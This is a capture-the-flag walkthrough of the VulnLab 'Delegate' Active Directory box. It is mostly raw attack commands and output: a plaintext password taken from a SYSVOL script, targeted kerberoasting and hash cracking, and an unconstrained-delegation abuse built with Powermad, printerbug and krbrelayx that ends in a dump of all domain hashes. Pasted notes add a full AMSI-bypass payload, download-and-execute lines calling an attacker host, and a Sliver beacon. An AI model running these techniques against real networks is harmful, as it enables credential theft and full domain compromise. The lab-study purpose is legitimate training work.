vulnlab delegate
Delegate is an Medium rated AD machine that’s about exploiting the SeEnableDelegationPrivilege of the compromised user, and creating a machine account with unconstrained delegation.
.
┌──(puck㉿kali)–[~/vulnhub/delegate]
└─$ impacket-lookupsid guest@delegate.vl 10000
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Brute forcing SIDs at delegate.vl
[*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc]
[*] Domain SID is: S-1–5–21–1484473093–3449528695–2030935120
498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DELEGATE\Administrator (SidTypeUser)
snip
1108: DELEGATE\N.Thompson (SidTypeUser)
1121: DELEGATE\delegation admins (SidTypeGroup)
.
┌──(puck㉿kali)–[~/vulnhub/delegate]
└─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[–] User A.Briggs doesn‘t have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn’t have UF_DONT_REQUIRE_PREAUTH set
[–] User R.Cooper doesn‘t have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn’t have UF_DONT_REQUIRE_PREAUTH set
[–] User N.Thompson doesn’t have UF_DONT_REQUIRE_PREAUTH set
[–] invalid principal syntax
.
┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ smbclient //delegate.vl/SYSVOL -U puck
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Sep 9 09:52:30 2023
.. D 0 Sat Aug 26 05:39:25 2023
delegate.vl Dr 0 Sat Aug 26 05:39:25 2023
5242879 blocks of size 4096. 1960185 blocks available
smb: \> cd delegate.vl\
smb: \delegate.vl\> ls
. D 0 Sat Aug 26 05:45:45 2023
.. D 0 Sat Aug 26 05:39:25 2023
DfsrPrivate DHSr 0 Sat Aug 26 05:45:45 2023
Policies D 0 Sat Aug 26 05:39:30 2023
scripts D 0 Sat Aug 26 08:45:24 2023
5242879 blocks of size 4096. 1960185 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
. D 0 Sat Aug 26 08:45:24 2023
.. D 0 Sat Aug 26 05:45:45 2023
users.bat A 159 Sat Aug 26 08:54:29 2023
5242879 blocks of size 4096. 1960182 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \delegate.vl\scripts\>
.
┌──(puck㉿kali)–[~/vulnhub/delegate]
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
Bloodhound to get more info
┌──(puck㉿kali)–[~/vulnhub/delegate]
└─$ bloodhound-python -d delegate.vl -c all -u ‘A.Briggs’ -p ‘P4ssw0rd1#123’ -ns 10.10.114.169
Upload data to Bloodhound, we find
The user A.BRIGGS@DELEGATE.VL has generic write access to the user N.THOMPSON@DELEGATE.VL.
Generic Write access grants you the ability to write to any non-protected attribute on the target object, including “members” for a group, and “serviceprincipalnames” for a user
A targeted kerberoast attack can be performed using targetedKerberoast.py.
targetedKerberoast.py -v -d ‘domain.local’ -u ‘controlledUser’ -p ‘ItsPassword’
The tool will automatically attempt a targetedKerberoast attack, either on all users or against a specific one if specified in the command line, and then obtain a crackable hash.
┌──(puck㉿kali)–[~/vulnhub/delegate]
└─$ cd targetedKerberoast
┌──(puck㉿kali)–[~/vulnhub/delegate/targetedKerberoast]
kerberoastables.txt LICENSE README.md requirements.txt targetedKerberoast.py
┌──(puck㉿kali)–[~/vulnhub/delegate/targetedKerberoast]
┌──(puck㉿kali)–[~/vulnhub/delegate/targetedKerberoast]
kerberoastables.txt LICENSE README.md requirements.txt targetedKerberoast.py venv
┌──(puck㉿kali)–[~/vulnhub/delegate/targetedKerberoast]
└─$ source venv/bin/activate
┌──(venv)─(puck㉿kali)–[~/vulnhub/delegate/targetedKerberoast]
└─$ pip3 install -r requirements.txt
Collecting ldap3 (from -r requirements.txt (line 1))
Using cached ldap3-2.9.1-py2.py3-none-any.whl.metadata (5.4 kB)
Using cached pycparser-2.22-py3-none-any.whl (117 kB)
Installing collected packages: six, pygments, pycryptodomex, pycryptodome, pycparser, pyasn1, mdurl, MarkupSafe, itsdangerous, future, dsinternals, dnspython, click, charset-normalizer, blinker, Werkzeug, markdown-it-py, ldap3, Jinja2, cffi, rich, ldapdomaindump, flask, cryptography, pyOpenSSL, impacket
Successfully installed Jinja2-3.1.4 MarkupSafe-2.1.5 Werkzeug-3.0.3 blinker-1.8.2 cffi-1.16.0 charset-normalizer-3.3.2 click-8.1.7 cryptography-42.0.8 dnspython-2.6.1 dsinternals-1.2.4 flask-3.0.3 future-1.0.0 impacket-0.11.0 itsdangerous-2.2.0 ldap3-2.9.1 ldapdomaindump-0.9.4 markdown-it-py-3.0.0 mdurl-0.1.2 pyOpenSSL-24.1.0 pyasn1-0.6.0 pycparser-2.22 pycryptodome-3.20.0 pycryptodomex-3.20.0 pygments-2.18.0 rich-13.7.1 six-1.16.0
┌──(venv)─(puck㉿kali)–[~/vulnhub/delegate/targetedKerberoast]
└─$ python3 targetedKerberoast.py -u ‘A.Briggs’ -p ‘P4ssw0rd1#123’ –request-user N.Thompson -d ‘delegate.vl’
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$69b5ede798c5c49a1d7fa396a7746c96$2b53511a3c352538045977f5360dfca5bee63e4aa8642cdb9b3f09704ba8eaeef308c38669d23a3f3ba0f374981ae0c77ecddc68af4ac7fe35a3263f3171c4a9161d04c724be976653e9d02492946aa2ad04db3701bceabd2ec47c22949832fe4b94b4e38ca9fec1f93b42780cfc1b30b3c3136595be8f3087139da24876015e017dc5134683647a328496682b1129496ead62ab751f977c58e38599d7fdddce58c76e0054356b06eed9aebecc586e9e2481fa59bf2449b441185fca2c04e5f9f4feeaa0f3520d0193d7478d9fd64ca2e7a23792542765faef51f96ce15e1520b52560a70dc771b97bb3ccb5a1c1f52656e81ea82aa178ba820100cb51a256d5b58771b8653392c8746067729de122f346cc6a12716fa3e45c9ac842c3937313abf104b30aa1224c9aff9816bcf166cae6835a5dda97e3bc7d0d05074bc08c7a1659b6eb577a5a1bdca341c1f80dc438a2d6eea7ff511192dc624248911f392cb776ab76ba723196a322129018fd4458eebcabb425e1fdfdba0a4e2cf0541bef6f43fd6be6cf921acb019d334a2317a3892cfe893a2c1d9fa279272d61ab540a2058102d5fc4c205f70e9a06346de822169ade4b5c7229961142af8ef517f4361559ca16f46cdf214428fe685d6ff76e53ccd7108e03f552974de9a1656c0afcd25bce077ad6ac379ddcee504556821e895f911ed6b8db0356a39f865863fc8458f48d78a1c266715e388c2577b98081e16662594a44e1736f6d37f336b1932ef0752bcfa46f22b70199af44aaa7500b5179fd028afd41c371ed0f3aa7fb982769fb12d89dee3861c595eca50954a1c4cb6652327cc1ab29de1a7858b6c865542a1ad9bfdfb0bb9408f0b1496170e966729b2fadeb07a3f67931558bc42dda3efc556877fb2661a5f4e3bb69ca1aa771d5e692572337c8fc9251edc4f6ddf8cbfaba280e562735e3d95cef97daf397e1df170d211798e2619807fb75c89de3ea8a53ec69f276eeb0e95190b39d3f96a4c08a196149268dae0db766d71b4f22411312f4766f683d0b2f64a1bf1443d302f9bf7fb5b1058aff75327a3f771a261e45f60b904c562f88c2b6261692ccca2e04b0381a9a92c7a0eb0bc0d0aec7f5b26a1ffb374cd4651a7a2f12ffa9672386c0dae6148e1f5fdfa01cc005bed67c28a1f047324bb0e650abff3c3cd727542bc5a83b234b4c7c17fa354fa55e58da3d475fa35bd4ea865bc2eb70d5f9b00b6b386169483c5020172862eded630c5088f7ee121c2e8bc75852770aefe68eadbdffa7268c87af0a6703951b65dfc60a47a063275288c5ebb0bb3524a3fa06bcd5ac1372addd9625a1b61f49160c266dd6b09ad146ec56f56bed4eccee9f37220ff9c6b25134f2f7d0cecfe20feec300b1932af55b00a71f4ac3eedc818e422fb28b65bfd5e207a86b8b358e775102c2421e27072a
┌──(venv)─(puck㉿kali)–[~/vulnhub/delegate/targetedKerberoast]
.
┌──(puck㉿kali)–[~/vulnhub/delegate]
└─$ john -w:/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
1g 0:00:00:03 DONE (2024–06–10 12:40) 0.2695g/s 2966Kp/s 2966Kc/s 2966KC/s KANECHA1..KABYLS3427
Use the “–show” option to display all of the cracked passwords reliably
Privesc
We can log into the machine with evil-winrm and enumerate N.Thompson’s privileges.
We can see that they have the SeEnableDelegationPrivilege enabled.
We can abuse unconstrained Kerberos delegation in Active Directory (AD) to elevate privileges to SYSTEM. We can use the krbrelayx toolkit, which leverages unconstrained delegation to obtain Ticket Granting Tickets (TGTs) from users connecting to an attacker-controlled host.
First, we need to check to make sure that ldap signing is turned off and there are available machines in the machine quota.
┌──(puck㉿kali)–[~/vulnhub/delegate]
└─$ crackmapexec ldap delegate.vl -u ‘N.Thompson’ -p ‘KALEB_2341’ -M maq
SMB dc1.delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
LDAP dc1.delegate.vl 389 DC1 [+] delegate.vl\N.Thompson:KALEB_2341
MAQ dc1.delegate.vl 389 DC1 [*] Getting the MachineAccountQuota
MAQ dc1.delegate.vl 389 DC1 MachineAccountQuota: 10
.
Next, we upload Powermad.ps1 to the machine and use it to set up our attacker controlled machine account and then set the UserAccountControl attribute. We want to set the useraccountcontrol attribute to the value 528384, which includes the TRUSTED_FOR_DELEGATION flag (indicating unconstrained delegation privileges).
Using powermad & printerbug
┌──(puck㉿kali)–[~/vulnhub/delegate]
└─$ evil-winrm -i DC1.delegate.vl -u N.Thompson -p KALEB_2341
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> upload Powermad.ps1
Info: Uploading /home/puck/vulnhub/delegate/Powermad.ps1 to C:\Users\N.Thompson\Documents\Powermad.ps1
Data: 180768 bytes of 180768 bytes copied
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount PWNED -Password $(ConvertTo-SecureString ‘12345’ -AsPlainText -Force)
[+] Machine account PWNED added
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384
[+] Machine account pwned attribute useraccountcontrol updated
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Value HTTP/PWNED.delegate.vl -Append
[+] Machine account pwned attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount pwned -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=pwned,CN=Computers,DC=delegate,DC=vl
RestrictedKrbHost/PWNED.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>
—
certutil.exe -urlcache -f http://10.8.2.138/powerpoint.exe power.exe [sliver beacon]
sliver > https –lport 8443
sliver > jobs
ID Name Protocol Port Stage Profile
==== ======= ========== ======
1 https tcp 8443
[*] Beacon 9bc2112c sitecar-3 – 10.10.134.198:50150 (ws01) – windows/amd64 – Wed, 20 Nov 2024 12:31:32 CET
sliver > use 9bc2112c-9bb3-44c5-a1fd-038fff83264e
[*] Active beacon sitecar-3 (9bc2112c-9bb3-44c5-a1fd-038fff83264e)
sliver (sitecar-3) >
$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) …
10.10.248.86 – – [20/Nov/2024 10:41:55] “GET /AMSIBypassPatch.ps1 HTTP/1.1” 200 –
10.10.248.86 – – [20/Nov/2024 10:53:37] “GET /PowerView.ps1 HTTP/1.1” 200 –
10.10.248.86 – – [20/Nov/2024 11:11:54] “GET /amsi.txt HTTP/1.1” 200 –
from beacon
sliver (sitecar-3) > execute powershell.exe (new-object system.net.webclient).downloadstring(“http://10.8.2.138:8000/AMSIBypassPatch.ps1”)|iex
[*] Tasked beacon sitecar-3 (39a54d03)
[+] sitecar-3 completed task 39a54d03
[*] Command executed successfully
sliver (sitecar-3) >
cat amsi.txt
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like “*iUtils”) {$c=$b}};$d=$c.GetFields(‘NonPublic,Static’);Foreach($e in $d) {if ($e.Name -like “*Context”) {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)
sliver (sitecar-3) > execute powershell.exe (new-object system.net.webclient).downloadstring(“http://10.8.2.138:8000/amsi.txt”)|iex
[*] Tasked beacon sitecar-3 (305d3b54)
[+] sitecar-3 completed task 305d3b54
[*] Command executed successfully
sliver (sitecar-3) > execute powershell.exe (new-object system.net.webclient).downloadstring(“http://10.8.2.138:8000/PowerView.ps1”)|iex
[*] Tasked beacon sitecar-3 (ef02a107)
[+] sitecar-3 completed task ef02a107
[*] Command executed successfully
certutil.exe -urlcache -f http://10.8.2.138:8000/rcat_10.8.2.138_443.exe rcat_10.8.2.138_443.exe
—
check with amsi-bypass and PowerView.ps1 if it worked
(new-object system.net.webclient).downloadstring(“http://10.8.2.138:8000/AMSIBypassPatch.ps1”)|iex
get-domaincomputer -unconstrained | select distinguishedname, useraccountcontrol
*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/PowerView.ps1")|iex
At line:1 char:1
+ #requires -version 2
+ ~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:90
+ ... webclient).downloadstring("http://10.8.2.138:8000/PowerView.ps1")|iex
+ ~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
*Evil-WinRM* PS C:\windows\tasks>
*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/AMSIBypassPatch.ps1")|iex
Protection Disabled
*Evil-WinRM* PS C:\windows\tasks> (new-object system.net.webclient).downloadstring("http://10.8.2.138:8000/PowerView.ps1")|iex
*Evil-WinRM* PS C:\windows\tasks> get-domaincomputer -unconstrained | select distinguishedname, useraccountcontrol
distinguishedname useraccountcontrol
----------------- ------------------
CN=DC1,OU=Domain Controllers,DC=delegate,DC=vl SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
CN=PWNED,CN=Computers,DC=delegate,DC=vl WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
*Evil-WinRM* PS C:\windows\tasks>
We are going to now get the NTLM hash for the password we set, we can do this with some simple python:
>>> import hashlib
>>> print(hashlib.new(‘md4’, ‘12345’.encode(‘utf-16le’)).hexdigest())
7A21990FCD3D759941E45C490F143D5F
setup the listener ( waiting for connection then)
┌──(puck㉿kali)–[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.105.77
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.105.77
[–] Unsupported MechType ‘NTLMSSP – Microsoft NTLM Security Support Provider’
[*] SMBD: Received connection from 10.10.105.77
[–] Unsupported MechType ‘NTLMSSP – Microsoft NTLM Security Support Provider’
start printerbug
┌──(venv)─(puck㉿kali)–[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u ‘delegate.vl\pwned$’ -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 –action add -dns-ip 10.10.105.77 DC1.delegate.vl
[+] LDAP operation completed successfully
┌──(venv)─(puck㉿kali)–[~/vulnhub/delegate/krbrelayx]
addspn.py ‘DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache’ krbrelayx.py LICENSE printerbug.py venv
bloodyAD dnstool.py lib PetitPotam README.md
┌──(venv)─(puck㉿kali)–[~/vulnhub/delegate/krbrelayx]
└─$ python3 printerbug.py delegate.vl/‘PWNED$’@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 – Copyright 2023 Fortra
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
DCERPC Runtime Error: code: 0x5 – rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
┌──(venv)─(puck㉿kali)–[~/vulnhub/delegate/krbrelayx]
use impacket-secrectsdump to get the hashes.
┌──(puck㉿kali)–[~/vulnhub/delegate/krbrelayx]
└─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
┌──(puck㉿kali)–[~/vulnhub/delegate/krbrelayx]
Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL
Valid starting Expires Service principal
06/12/2024 07:13:23 06/12/2024 17:07:36 krbtgt/DELEGATE.VL@DELEGATE.VL
renew until 06/19/2024 07:07:36
┌──(puck㉿kali)–[~/vulnhub/delegate/krbrelayx]
└─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm
Impacket v0.12.0.dev1 – Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e:::
PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
.
That’s it! We created a machine account with unconstrained delegation privileges. We then used that machine to intercept the Domain Controller’s (DC) Kerberos Ticket Granting Ticket (TGT). Using that ticket, we were able to authenticate as the DC and dump all of the password hashes.
Resources
https://github.com/ShutdownRepo/targetedKerberoast
https://hashcat.net/wiki/doku.php?id=example_hashes
https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
https://github.com/Kevin-Robertson/Powermad
https://github.com/okankurtuluss/amsibypasspatch
.